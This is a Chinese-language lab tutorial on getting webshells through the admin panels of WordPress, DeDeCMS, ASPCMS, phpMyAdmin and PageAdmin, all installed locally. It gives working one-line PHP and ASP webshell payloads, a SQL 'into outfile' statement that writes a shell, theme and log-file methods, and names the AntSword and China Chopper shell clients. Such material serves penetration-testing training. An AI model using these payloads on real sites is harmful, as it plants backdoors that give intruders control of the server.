一、wordpress

安裝環境

首先我們在vulhub中啟動我們wordpress的doaker容器

然后去訪問我們的80端口

然后選擇簡體中文進行安裝

然后就可以登錄到我們的后臺界面了

后臺修改模板拿webshell

進入后臺，我們修改一下404頁面的代碼，添加我們的一句話木馬

然后保存，拼接路徑去訪問一下404.php頁面看一下有沒有解析我們的php語言

/wp-content/themes/twentyfifteen/404.php

?可以看到我們的木馬被成功解析，接下來只需要蟻劍連接即可

上傳主題拿webshell

首先我們先去主題網站上下載一套主題，要注意大小不要太大

然后將我們的一句話木馬添加到這個壓縮包中

然后將這個主題上傳

可以看到上傳成功

然后按照上個方法拼接路徑即可

然后就可以使用蟻劍連接了

二、DeDeCMS

首先安裝好我們的DeDeCMS，找一個壓縮包解壓到網站根目錄即可

訪問我們的網站,按照步驟教程安裝即可

通過文件管理器拿webshell

登錄后臺管理界面后選擇模塊--文件管理器上傳我們的木馬文件

<?php phpinfo();@eval($_POST[cmd]);?>

可以看到上傳成功

訪問我們的一句話木馬，可以看到上傳成功

蟻劍連接即可

修改模板文件拿webshell

按照圖示內容修改index.htm文件的內容

在文件內容開頭加上我們的一句話木馬

然后去修改，這個位置的內容

修改為，圖示內容并保存

可以看到我們的木馬已經被解析生效了，接下來只需要蟻劍連接即可

后臺任意命令執行拿webshell

首先來到圖片位置，添加一個廣告

廣告內容寫上我們的一句話木馬，點擊確定保存

回到廣告管理頁面，點擊代碼，即可看到我們廣告的路徑拼接即可

查看頁面源代碼即可看到我們的一句話木馬已經被解析了

使用菜刀進行連接即可

后臺SQL命令執行拿webshell

找到圖示位置

在這里我們可以利用into outfile來寫入一句話木馬

select '<?php phpinfo();@eval($_POST[cmd]);?>' into outfile 'E:/phpstudy_pro/WWW/1.php'

然后去訪問我們上傳的路徑，報錯的注意要修改一下my.ini中的配置文件

可以看到我們的一句話木馬被解析了，然后蟻劍連接即可

三、ASPCMS

這次我們需要在iis中進行安裝

找到我們iis的根目錄，將我的ASPCMS壓縮包解壓到根目錄即可

然后按照步驟進行安裝，安裝好后訪問我們的后臺，注意后臺的路徑，然后登錄即可

后臺修改配置文件拿webshell

按照圖示找到位置

然后我們點擊保存進行抓包

修改一下圖中所示字段

修改為

1%25><%25Eval(Request (chr(65)))%25><%25

然后就可以根據以下地址進行菜刀連接

可以看到連接成功

四、PhPMyadmin

首先我們在小皮面板中安裝一個PhPMyadmin

然后去訪問，登錄

通過日志拿webshell?

首先，點擊變量然后搜索gen

然后將圖中所示的兩個值修改為，這樣就可以將日志寫入我門根目錄下的1.php文件中

然后按照圖示寫一句話木馬，點擊執行

然后去訪問我們的1.php，可以看到我們的一句話木馬已經被解析了，接下來蟻劍訪問即可

?導入導出拿webshell

在sql命令執行欄中輸入，即看到數據庫的地址，這樣我們可以判斷網站根目錄的地址在哪

然后運用into outfile將我們的一句話木馬寫入網站的根目錄中

然后去訪問我們的2.php，可以看到一句話木馬被解析，然后蟻劍連接即可

五、Pageadmin

仿照上面的步驟解壓到根目錄即可，注意這關需要使用的是sqlserver數據庫，需要安裝到iis中，選擇存在的數據庫名字

安裝好登錄即可

上傳文件解壓拿webshell

注意這里要上傳的是壓縮包，我們需要將我們的一句話木馬添加到壓縮包中

上傳之后解壓即可

然后去訪問我們的1.asp

使用蟻劍連接即可

上傳模塊拿webshell

按照圖示即可上傳我們的木馬文件的壓縮包，但是這里需要授權